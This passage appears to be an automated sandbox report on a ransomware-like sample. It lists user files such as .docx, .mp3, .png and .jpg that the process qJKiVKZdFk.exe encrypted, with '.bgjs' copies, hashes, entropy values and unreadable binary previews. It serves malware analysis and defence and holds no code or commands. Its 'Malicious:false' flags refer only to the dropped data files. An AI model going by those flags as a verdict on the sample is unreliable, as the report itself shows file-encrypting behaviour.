                                                                                                                                      Preview:NWCXB.+..dW..Y...:~........\I..7....n|wr|+..t...._Hv....D.......^q..}B6*(.&_:......c......4(......n....q.....V<..i.>6R..2.s.X...[/G....c...so....0.W.....U...s.9./-.L.sN.iV....Q..R......`y".R...(.8..."a.4..R........JA.......S.W].C.^.T.@.,..&^.@...#k./mn....Ck....$.j.....%.0.3...d..Zcy...h....^L../...!p.".m..3........h..g9....UH...L...r.b......9..L.*....m.."..]......AD.......5..Lzt...<I.rT..}Q>.Kv..Po. ..B.8+..N....|.Q}}.Wx......jL..B......g.IXK..~.....6.],..s.^.fh.+..|....qK..y..Z^...,...sxg]..N..Q./.+..0.1......B )....5N$zt..*Y...,.~..c9l.n.O..i.3P.u.2T_.8f...X....h....L..[..MN(.....>#..G..g9./..ds..CF.......d7.........r.. ....X.YI&i....!0.Y...n.....4af.n.B...G... 6..JK...y6HIE.J}.].)..E-......O...:.&.t{.Y(...Kn.l..v..I..0%W..P.W/.;.Zb~.{..J...k.':.7wi.... ....>ZH.[..m/...O.q...5...v...6.x.<3.....9..6.`..g$......E..Cv..Yz....i67OG..7.E.<\r..?sOB&..?)i......w~5yvh.s.6..ig.p!_.xK3.Pr.k..~=..SP..y.4]):.`<...Uf{.78.\.)H...2...O...{N......r.

                                                                                                                                      C:\Users\user\Desktop\NYMMPCEIMA\NYMMPCEIMA.docx

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.8502555297554135
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:iH0Em+FpILu86F9+c4mQSRBB1Fa7JxByDkrk9ogSVYQNa0RQ/fJzbD:iH0EmA2M1NQ0v1Fa7J6enMJD
                                                                                                                                      MD5:071B05B0762F80E0A80D3A51E726E11F
                                                                                                                                      SHA1:C119AEED9ED6EACD810E8B5A442D2EC4D9574482
                                                                                                                                      SHA-256:CAD577CFEAA0C0EA8311937C21A74F3DB11893ED9DE0AB117434FDB9980CAB2F
                                                                                                                                      SHA-512:9D201ED8CC971146E5B01C5A102FA664977B92085F23055640F94AA26460D2EFC8AFF05B4219D0F278290F0E85D839898EFCB4BB38D39CC28E45D6061AF292E9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:NYMMP..D.....<q.h......b8...}BX..3.8.i..5.!..!.`......_q.Q..83}.)2....'"b...~4.m%U=#..?.U.#..8,...m.z.b..;........w.|......X.?!Au.U.rg.h..\.N..BU.ag..ye]...T..WR.g.X....u.V..o.t.~...P..{Y.*..5..K..a.@.S.....}2A..j.tl]..c.....;d..g....fB..V.5...f...}..Wu0.....Xx.....%.B.4J.S..H..v#..~../E..'..{...%.:.....x.....J...iD6Ve$.%e.j....:..rr.tS..".......*`\-H^r.QL..9...5..~rr..wh...V.).6...f.WbSa.y...i.p....4..=.#.|.{....+..-.g.....,...{S.)s.qh..yZ~..H2.M.A#.N..|-4..4.V...z8S..F...3E6...O-..W.._...8.;..,..|..z.&!..v"....@..B..#.y._o..8.-..u6)".._8(.t...'...xP.&..W...}...p......$.;... F.sY$.tV..m..b^..e...ND.p.z9..c..O.#....]..D)...M....~.."B....T....7D. ...).R.s7.9$.]V.7...2.V..+.@.G_..R.Z.jQ?......d,...gLu&0.....;.r....Aks.^.N.....t?3.:..z.|FqW}5......!....rlN.....8......(...+...L.!.Z.Q.X.......WI..t...A.-.m4@g;*l....o......L?...............~.<..h.w.:"r..fW...-..U.%Zl...XV...'..f#.8.........G..e.q<.. ..0.}.PXf.~...M../.E.h....>..-..:2:..9..n....X#.G.

                                                                                                                                      C:\Users\user\Desktop\NYMMPCEIMA\NYMMPCEIMA.docx.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.8502555297554135
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:iH0Em+FpILu86F9+c4mQSRBB1Fa7JxByDkrk9ogSVYQNa0RQ/fJzbD:iH0EmA2M1NQ0v1Fa7J6enMJD
                                                                                                                                      MD5:071B05B0762F80E0A80D3A51E726E11F
                                                                                                                                      SHA1:C119AEED9ED6EACD810E8B5A442D2EC4D9574482
                                                                                                                                      SHA-256:CAD577CFEAA0C0EA8311937C21A74F3DB11893ED9DE0AB117434FDB9980CAB2F
                                                                                                                                      SHA-512:9D201ED8CC971146E5B01C5A102FA664977B92085F23055640F94AA26460D2EFC8AFF05B4219D0F278290F0E85D839898EFCB4BB38D39CC28E45D6061AF292E9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:NYMMP..D.....<q.h......b8...}BX..3.8.i..5.!..!.`......_q.Q..83}.)2....'"b...~4.m%U=#..?.U.#..8,...m.z.b..;........w.|......X.?!Au.U.rg.h..\.N..BU.ag..ye]...T..WR.g.X....u.V..o.t.~...P..{Y.*..5..K..a.@.S.....}2A..j.tl]..c.....;d..g....fB..V.5...f...}..Wu0.....Xx.....%.B.4J.S..H..v#..~../E..'..{...%.:.....x.....J...iD6Ve$.%e.j....:..rr.tS..".......*`\-H^r.QL..9...5..~rr..wh...V.).6...f.WbSa.y...i.p....4..=.#.|.{....+..-.g.....,...{S.)s.qh..yZ~..H2.M.A#.N..|-4..4.V...z8S..F...3E6...O-..W.._...8.;..,..|..z.&!..v"....@..B..#.y._o..8.-..u6)".._8(.t...'...xP.&..W...}...p......$.;... F.sY$.tV..m..b^..e...ND.p.z9..c..O.#....]..D)...M....~.."B....T....7D. ...).R.s7.9$.]V.7...2.V..+.@.G_..R.Z.jQ?......d,...gLu&0.....;.r....Aks.^.N.....t?3.:..z.|FqW}5......!....rlN.....8......(...+...L.!.Z.Q.X.......WI..t...A.-.m4@g;*l....o......L?...............~.<..h.w.:"r..fW...-..U.%Zl...XV...'..f#.8.........G..e.q<.. ..0.}.PXf.~...M../.E.h....>..-..:2:..9..n....X#.G.

                                                                                                                                      C:\Users\user\Desktop\NYMMPCEIMA\VWDFPKGDUF.mp3

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.861426526276498
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:MH/WgvFhm3Z48fYDtThYB+8S6ofOKlg7hh6HOft2d8dsmqQboU5bD:c+QhC48feS+Yt+gFhnWQ8U5D
                                                                                                                                      MD5:10A65FD0336507802DB07BF2C4B4F77C
                                                                                                                                      SHA1:A70CF5AAA5E9A33DE8757E4738F575B2A1742E86
                                                                                                                                      SHA-256:E20295631A0DE743EC70DBC7129B12F78300B0858A85AA9CEFA41D5B0C4EAD09
                                                                                                                                      SHA-512:6C823996E887178AC3EE17F4B2C572DB62EC6F85E736D64DDD8D96EC110762B553571C8A801CFB0A0EEE7455130F1F26A23ADA7EA19366CDB9F21CAA6A82DFF4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:VWDFPXp.X.....A9C .{..u."j...M.....G.l..R...b...R...P.....'.B..C...&.]..x../...=.$.JX....j!D.......E%.Rx{....&......L....z.DZ...A.B.......;."H...5.(}.I..V!..4}..E{.FE.(...3.^(.j.=0-...g.........x...P.;Y-.w.....|4pe..y..q../...%...t.......F~pM.3#v.QI.N...vq8T...a....\q.uwkP.A.2.CH...`..g...Y.......N,...s(.[.....-os.e.A..a}$.0.3..y..&.B.KBRM..x*.....da@.M.Tw...+.zX.M.0. ..x..qK...o...Qj...R..=|.*.V...P.@-=....=...P^....W.G..z.;1e.J.........[.sD...XN.Do.v.:&.WL....i.I.d..w..@.}.....h.....0...e.e........~t.nr......}e.......o5...Id.)tj..d=.M*c..M..N/..Pcm6]^...'..sK..f.H..........o.n.....v.b..`...3j&?U..;..Y....Q\D2.r...{...m..j.....6Qk.n.[H../.n.T.,5.28&...#{.C......W.ZO%6....R ..28.?.U`J......".........5H.H.......(.7F0....J......K.z..d."......{f......@..B....$..bU.^^i ....)F.1>x....5.p'+..i.k...;..H.;...X......F...5...:...SA..M.!t..P.O....V....a.x.5..eM...V..B....4.!....^......I.Da..........8".:.3.pq......u..X}...k..y...CM...`...@.e.(.!

                                                                                                                                      C:\Users\user\Desktop\NYMMPCEIMA\VWDFPKGDUF.mp3.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.861426526276498
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:MH/WgvFhm3Z48fYDtThYB+8S6ofOKlg7hh6HOft2d8dsmqQboU5bD:c+QhC48feS+Yt+gFhnWQ8U5D
                                                                                                                                      MD5:10A65FD0336507802DB07BF2C4B4F77C
                                                                                                                                      SHA1:A70CF5AAA5E9A33DE8757E4738F575B2A1742E86
                                                                                                                                      SHA-256:E20295631A0DE743EC70DBC7129B12F78300B0858A85AA9CEFA41D5B0C4EAD09
                                                                                                                                      SHA-512:6C823996E887178AC3EE17F4B2C572DB62EC6F85E736D64DDD8D96EC110762B553571C8A801CFB0A0EEE7455130F1F26A23ADA7EA19366CDB9F21CAA6A82DFF4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:VWDFPXp.X.....A9C .{..u."j...M.....G.l..R...b...R...P.....'.B..C...&.]..x../...=.$.JX....j!D.......E%.Rx{....&......L....z.DZ...A.B.......;."H...5.(}.I..V!..4}..E{.FE.(...3.^(.j.=0-...g.........x...P.;Y-.w.....|4pe..y..q../...%...t.......F~pM.3#v.QI.N...vq8T...a....\q.uwkP.A.2.CH...`..g...Y.......N,...s(.[.....-os.e.A..a}$.0.3..y..&.B.KBRM..x*.....da@.M.Tw...+.zX.M.0. ..x..qK...o...Qj...R..=|.*.V...P.@-=....=...P^....W.G..z.;1e.J.........[.sD...XN.Do.v.:&.WL....i.I.d..w..@.}.....h.....0...e.e........~t.nr......}e.......o5...Id.)tj..d=.M*c..M..N/..Pcm6]^...'..sK..f.H..........o.n.....v.b..`...3j&?U..;..Y....Q\D2.r...{...m..j.....6Qk.n.[H../.n.T.,5.28&...#{.C......W.ZO%6....R ..28.?.U`J......".........5H.H.......(.7F0....J......K.z..d."......{f......@..B....$..bU.^^i ....)F.1>x....5.p'+..i.k...;..H.;...X......F...5...:...SA..M.!t..P.O....V....a.x.5..eM...V..B....4.!....^......I.Da..........8".:.3.pq......u..X}...k..y...CM...`...@.e.(.!

                                                                                                                                      C:\Users\user\Desktop\QCOILOQIKC.docx

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.86025731709544
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:MkTfDt0Qqc93ulmiCPUrolmxM+UURiCF7U5e5KuS5QyFxgtFJ8+1bD:MkTfh8EziCuYmxM4RxF7bKuSGyrgtFJb
                                                                                                                                      MD5:204FE20B5DA74E3A8001881D50882651
                                                                                                                                      SHA1:417F948C55A698928FF4C571E6AE277B1E809A5D
                                                                                                                                      SHA-256:5D4FD24EEDF49FCB2CBAF522F354EBC89F410ED9E00F31E185C18CCD5A8A3CAA
                                                                                                                                      SHA-512:4DB320EEB6F8A6F342B8EB5641BA23DA71250391550461285F78C5F00535085460821248E54585F60C17787FE94BBE4237F32D6E549A2449A17A83A3F33A9B9F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:QCOIL........*.+5..'.Y.0.y.ZS..I..4..p.......U....~...2R+ ..o.#.b.HG....Yd..54......Zm.`.N..........E.. .....6G.'.-H.f....'a.*..M..w........Q1...Y.h..A......`5g......&7...o@~;((g..].....l...5.2.j...XN.....t}.....a..y.7..^L(l."G..n....o...>-O...)..d(..>...N...0..._...0..S..7s.u..?.......x}J..B.q.....'.D..8]..7..s.-.....i...5.t.'.U .....i..'..]...,...I.......#.;M.z3..|..W.v.CN..-.y.....lq....P.c....yn}.]....X.s.z.$y1.OH,...+P9..&.v..Z..J...a#...56i..A)....E:Z~'...Z..3.U^..........-[.p+4.C..I.~.w&..x..f....[h..1.Aa..Z..6..._.1!..k[....).-.#.O?mkO..p..i.[jD....}.W...m...A...w ...t(S.K..V.p....}..%..0.5.+.=Pb..5\?...ff..D..w.!.....|....E.p......x.Y.._...ab..=ly.3R...{..4...o...M. .-../.1..f...J..!...@...W.t....h}.}..&.y....q2.<........Z+....|O...0.j`B,(.^...-]h....n..-C.....P. .I..Y.Yp......./.............Be...9.A.E[.$Z.3s5.....J.3..lm.;.G..f...u..j.....V$...j..."..;..V0..9.z*.......E.fZt.h..]tZ|.(...k.....>.*..r....b....=.'.8

                                                                                                                                      C:\Users\user\Desktop\QCOILOQIKC.docx.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.86025731709544
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:MkTfDt0Qqc93ulmiCPUrolmxM+UURiCF7U5e5KuS5QyFxgtFJ8+1bD:MkTfh8EziCuYmxM4RxF7bKuSGyrgtFJb
                                                                                                                                      MD5:204FE20B5DA74E3A8001881D50882651
                                                                                                                                      SHA1:417F948C55A698928FF4C571E6AE277B1E809A5D
                                                                                                                                      SHA-256:5D4FD24EEDF49FCB2CBAF522F354EBC89F410ED9E00F31E185C18CCD5A8A3CAA
                                                                                                                                      SHA-512:4DB320EEB6F8A6F342B8EB5641BA23DA71250391550461285F78C5F00535085460821248E54585F60C17787FE94BBE4237F32D6E549A2449A17A83A3F33A9B9F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:QCOIL........*.+5..'.Y.0.y.ZS..I..4..p.......U....~...2R+ ..o.#.b.HG....Yd..54......Zm.`.N..........E.. .....6G.'.-H.f....'a.*..M..w........Q1...Y.h..A......`5g......&7...o@~;((g..].....l...5.2.j...XN.....t}.....a..y.7..^L(l."G..n....o...>-O...)..d(..>...N...0..._...0..S..7s.u..?.......x}J..B.q.....'.D..8]..7..s.-.....i...5.t.'.U .....i..'..]...,...I.......#.;M.z3..|..W.v.CN..-.y.....lq....P.c....yn}.]....X.s.z.$y1.OH,...+P9..&.v..Z..J...a#...56i..A)....E:Z~'...Z..3.U^..........-[.p+4.C..I.~.w&..x..f....[h..1.Aa..Z..6..._.1!..k[....).-.#.O?mkO..p..i.[jD....}.W...m...A...w ...t(S.K..V.p....}..%..0.5.+.=Pb..5\?...ff..D..w.!.....|....E.p......x.Y.._...ab..=ly.3R...{..4...o...M. .-../.1..f...J..!...@...W.t....h}.}..&.y....q2.<........Z+....|O...0.j`B,(.^...-]h....n..-C.....P. .I..Y.Yp......./.............Be...9.A.E[.$Z.3s5.....J.3..lm.;.G..f...u..j.....V$...j..."..;..V0..9.z*.......E.fZt.h..]tZ|.(...k.....>.*..r....b....=.'.8

                                                                                                                                      C:\Users\user\Desktop\QCOILOQIKC\CZQKSDDMWR.png

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.8510380139783225
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:7BvTMGTlhNRb5fT89aH43olRKru7orzSxp9sIhyTO5NcApjc0eoiPbbD:7h4SYw7oCsqyTMNpjheoinD
                                                                                                                                      MD5:46FA41C75D16C400C48D37ECFBA5E88E
                                                                                                                                      SHA1:092E0D2E902F5806F693BFFD7B69880BEA031669
                                                                                                                                      SHA-256:03B3D2C8D2042AACB2AAE8CEF7706C41CC666B2068FB891541380B27E890469F
                                                                                                                                      SHA-512:93DBE04392CA74C73D049F3B72280F3BF3C59D83A0DB0CA31D7B8E01BFF5AB81A62CFC1019CE37B646F2FB3D76AD3D6B2C6FC3C7C3E356F975642CB58124A664
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CZQKS1.....!..`......~..=g.=0...T".\.c..I.&c>) d.:9..N...........XP.H..nG".6.....$.6......Xc^..].....e......:...c.._..3.....-.[nG...n.D.S...._....HS"}.....0..z.R...~...}..H....._..a.L.0..,<..6.U+K9..6.;.........b.....N...^.].4]....M4.t..Z....CX..DI.s.&.u7.......<G8....*..J.".A.I>8V.fP...M....a......a^....EY-..u....a.C.ek/.9.f......Xj..& I.....>wA^.-4...H.}../.....a.p....4.p+F..;.e.<:.....g.f5.Dj.q...U..fTx..$t).O.z%f.J!......FG.=...W........."L?..S..g..<.......3&..C..st...V)v.x.<+.r..p..K.^>|.K.. ...,..`.+...8........g38{..I..*......?f..J*...?W{..../.UeDs........~.gK..=T.<...}.o...[9{..... .......kC.H.....1....I...kz.F....t...Fi......d.n$.*<A!.L..........m........>y..)Y".g..[..9O...S...a...B..(....V^..y....Odw\...<.e....I......J.F..z...EE.7.e..9M./9B.....e?..1G..._..r..........9...33I6;.....m...&.....4*.r..ZcH..L...'M.cG.n[.l./.....(..b.C....2$/6G<....T.R..y......a...t.Mb5K..i.c...I2.,...>...r... ?,.....(<k.<.p,.....i.3P...B?..K~-..O.I.q

                                                                                                                                      C:\Users\user\Desktop\QCOILOQIKC\CZQKSDDMWR.png.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.8510380139783225
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:7BvTMGTlhNRb5fT89aH43olRKru7orzSxp9sIhyTO5NcApjc0eoiPbbD:7h4SYw7oCsqyTMNpjheoinD
                                                                                                                                      MD5:46FA41C75D16C400C48D37ECFBA5E88E
                                                                                                                                      SHA1:092E0D2E902F5806F693BFFD7B69880BEA031669
                                                                                                                                      SHA-256:03B3D2C8D2042AACB2AAE8CEF7706C41CC666B2068FB891541380B27E890469F
                                                                                                                                      SHA-512:93DBE04392CA74C73D049F3B72280F3BF3C59D83A0DB0CA31D7B8E01BFF5AB81A62CFC1019CE37B646F2FB3D76AD3D6B2C6FC3C7C3E356F975642CB58124A664
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CZQKS1.....!..`......~..=g.=0...T".\.c..I.&c>) d.:9..N...........XP.H..nG".6.....$.6......Xc^..].....e......:...c.._..3.....-.[nG...n.D.S...._....HS"}.....0..z.R...~...}..H....._..a.L.0..,<..6.U+K9..6.;.........b.....N...^.].4]....M4.t..Z....CX..DI.s.&.u7.......<G8....*..J.".A.I>8V.fP...M....a......a^....EY-..u....a.C.ek/.9.f......Xj..& I.....>wA^.-4...H.}../.....a.p....4.p+F..;.e.<:.....g.f5.Dj.q...U..fTx..$t).O.z%f.J!......FG.=...W........."L?..S..g..<.......3&..C..st...V)v.x.<+.r..p..K.^>|.K.. ...,..`.+...8........g38{..I..*......?f..J*...?W{..../.UeDs........~.gK..=T.<...}.o...[9{..... .......kC.H.....1....I...kz.F....t...Fi......d.n$.*<A!.L..........m........>y..)Y".g..[..9O...S...a...B..(....V^..y....Odw\...<.e....I......J.F..z...EE.7.e..9M./9B.....e?..1G..._..r..........9...33I6;.....m...&.....4*.r..ZcH..L...'M.cG.n[.l./.....(..b.C....2$/6G<....T.R..y......a...t.Mb5K..i.c...I2.,...>...r... ?,.....(<k.<.p,.....i.3P...B?..K~-..O.I.q

                                                                                                                                      C:\Users\user\Desktop\QCOILOQIKC\GLTYDMDUST.mp3

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.838939084971132
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:NLwvkMcCBPJEDYKlex2DwzosHuvYgrh0kpk4NTecOavxaZWT1KrzUVDbD:NBTqyYKbDiHuvYgrjkEycOavxaZW0HU9
                                                                                                                                      MD5:4502816AD4552215ADCFD505F6985DBF
                                                                                                                                      SHA1:6B013DF1300B195747D6E734BC54A078021D8712
                                                                                                                                      SHA-256:37F3073CAD832800ADDFC6FCCA7F14C26C9C49829671F0ED20DCE59CF6D2B025
                                                                                                                                      SHA-512:B1D15097B33EE730AC794AE8D45A3A625134711C5785DE0A768F30256AD68FCFE0F7B919E3F5A10736905AC2A7649A1BD68B011AA9ADC35E31750CEF0B79189F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:GLTYD.1k^Z@.dT....Y./.[b.n5]<4d..q...9LN.x.}\.":..>..."z..4.NmF5...ya..~].......w...Z..o&$Hm.4.....t(.(w1u".6.k.M.wA...L..j5sp..B.....a.z......_d.$..wb}_.._:x./=..;..n....8...>...5...$..:..;^0.m"4.,........mV.L....e.....y...1%.{..v.?..!....?sL.......8...Dv%.^.....Hn.O..S....U.IA,.t...y.ac.Hv....._.s...tv.gML.A9.v..9S.6.....[Xo.......7...udG`8.Uh.%.~*...Z..6n3..Y...[p......../.,GS.y...0..em.........0...zT......Gc.[.LR.;...U......$....e.F...c.bU.f.!...w.U.0...!.t....j,......R_.t..@@...8.h....${....}O....t.P".........7.......`.>...J.S... Y.....RA'?Toh..5}K.....5..G.V...J.q....p.6Jj....@S...qa.....FIl..w.....q....^.-...R..%;..Q..>".RC...i.....)x.....M....Aw.f.YyN.......n?.f.q.-.[1..P.3..:..9.W..a~Z.?U..W. 6..y%.s~..q:....w..e..3:..vKu.b...C.r#.&.?...x.]....Y.p.uz..@0..I...f...Z..>ucu[......5.v.......lE(..^..."]..rPu........S.$w.-..t`..].`.WK.Xib..G...Mb...v(Y.L...a.N.<x.~;.......:......&.as.r.t.z.~..f..A.S?.d............8..h.f.U]&.#(..6.

                                                                                                                                      C:\Users\user\Desktop\QCOILOQIKC\GLTYDMDUST.mp3.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.838939084971132
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:NLwvkMcCBPJEDYKlex2DwzosHuvYgrh0kpk4NTecOavxaZWT1KrzUVDbD:NBTqyYKbDiHuvYgrjkEycOavxaZW0HU9
                                                                                                                                      MD5:4502816AD4552215ADCFD505F6985DBF
                                                                                                                                      SHA1:6B013DF1300B195747D6E734BC54A078021D8712
                                                                                                                                      SHA-256:37F3073CAD832800ADDFC6FCCA7F14C26C9C49829671F0ED20DCE59CF6D2B025
                                                                                                                                      SHA-512:B1D15097B33EE730AC794AE8D45A3A625134711C5785DE0A768F30256AD68FCFE0F7B919E3F5A10736905AC2A7649A1BD68B011AA9ADC35E31750CEF0B79189F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:GLTYD.1k^Z@.dT....Y./.[b.n5]<4d..q...9LN.x.}\.":..>..."z..4.NmF5...ya..~].......w...Z..o&$Hm.4.....t(.(w1u".6.k.M.wA...L..j5sp..B.....a.z......_d.$..wb}_.._:x./=..;..n....8...>...5...$..:..;^0.m"4.,........mV.L....e.....y...1%.{..v.?..!....?sL.......8...Dv%.^.....Hn.O..S....U.IA,.t...y.ac.Hv....._.s...tv.gML.A9.v..9S.6.....[Xo.......7...udG`8.Uh.%.~*...Z..6n3..Y...[p......../.,GS.y...0..em.........0...zT......Gc.[.LR.;...U......$....e.F...c.bU.f.!...w.U.0...!.t....j,......R_.t..@@...8.h....${....}O....t.P".........7.......`.>...J.S... Y.....RA'?Toh..5}K.....5..G.V...J.q....p.6Jj....@S...qa.....FIl..w.....q....^.-...R..%;..Q..>".RC...i.....)x.....M....Aw.f.YyN.......n?.f.q.-.[1..P.3..:..9.W..a~Z.?U..W. 6..y%.s~..q:....w..e..3:..vKu.b...C.r#.&.?...x.]....Y.p.uz..@0..I...f...Z..>ucu[......5.v.......lE(..^..."]..rPu........S.$w.-..t`..].`.WK.Xib..G...Mb...v(Y.L...a.N.<x.~;.......:......&.as.r.t.z.~..f..A.S?.d............8..h.f.U]&.#(..6.

                                                                                                                                      C:\Users\user\Desktop\QCOILOQIKC\NWCXBPIUYI.jpg

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.848783204094973
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:HPfqardq39AdDXXaYjAOqJNCWtWkMyhpLNMx++c1KFlSLuoge0RqPbD:HK1tAtf2JTMpx+NkSceJD
                                                                                                                                      MD5:831B5E3148C5AF3DB290AE704B5DC918
                                                                                                                                      SHA1:1861F34D357B80EBF0E3E2EBA55EB54E6CA7994B
                                                                                                                                      SHA-256:FDA0E23EEC78D6CC65EFCE37EB23B6E71E88F6FCAB9A084FBA80DE0456E019C2
                                                                                                                                      SHA-512:3423140FC61A9B4CDB21B071FD469C1D37496E98974D57896CE0E69A1F6F1EFD29814C8C2745756F849D81E4C708FFF05D9284EB544B9631BAD5E0D577A6BA37
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:NWCXB...4.J.`..NQ.&i......$.........._........<..Ia....6.......Y.7..n.....VD....'...kpv...e.Cb.Bs~..T.g...}D...4..s;.-..!G=..)%1....6d.*g'...v..{..C. u...Z.jiK..X#.q......9..~....n.(..P.:A..jR...(_b..D..p..C0.l...q!.].....~....'g..i]D.bFh".....K.7..Kp..u.a.O..n].*.iz.>.V._...n.D..o...L.3.LD.`.3x..A:....0...f.....f..P.<z6....bxaFv@.........@Ep8.:..Q..(......c*....=...7..fx...M.v...rg...pl...."0...8..,E..M....;.._pkw..[.8..U.u......=t..N&tRN..d...6.9....]..q.G^H^(~...{....d.Xx..11=G....t..2..?[..._.XB,m.....T..;.X....TVr..p.K2.'.."N.a..0.....lQ6..ELr...... 6.....m._..=...w(..@e..Q..;..SW..8~.e..=..7l..c.>...*b.......Hg.....-... ...a.A...x...?..AP2...9...8.K....&w..M....Z....Q*.6w.....?.]sU.........}b.%$..}...H..0..t.;...Q+&>.....IO|.>S'..g...h....0.._...!>.E{....P.M..*>..]C..+g_.eg.....Q..<z....E.`.wp....;.....9.y..0 f).3.Id._.(................I.6... i...%..W.*..K..$...+.P.<#"....n.=<w\C....&..R..c[....!..................2..S.e.I..a.6..g}.Q.{..w.:..

                                                                                                                                      C:\Users\user\Desktop\QCOILOQIKC\NWCXBPIUYI.jpg.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.848783204094973
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:HPfqardq39AdDXXaYjAOqJNCWtWkMyhpLNMx++c1KFlSLuoge0RqPbD:HK1tAtf2JTMpx+NkSceJD
                                                                                                                                      MD5:831B5E3148C5AF3DB290AE704B5DC918
                                                                                                                                      SHA1:1861F34D357B80EBF0E3E2EBA55EB54E6CA7994B
                                                                                                                                      SHA-256:FDA0E23EEC78D6CC65EFCE37EB23B6E71E88F6FCAB9A084FBA80DE0456E019C2
                                                                                                                                      SHA-512:3423140FC61A9B4CDB21B071FD469C1D37496E98974D57896CE0E69A1F6F1EFD29814C8C2745756F849D81E4C708FFF05D9284EB544B9631BAD5E0D577A6BA37
                                                                                                                                      Malicious:false
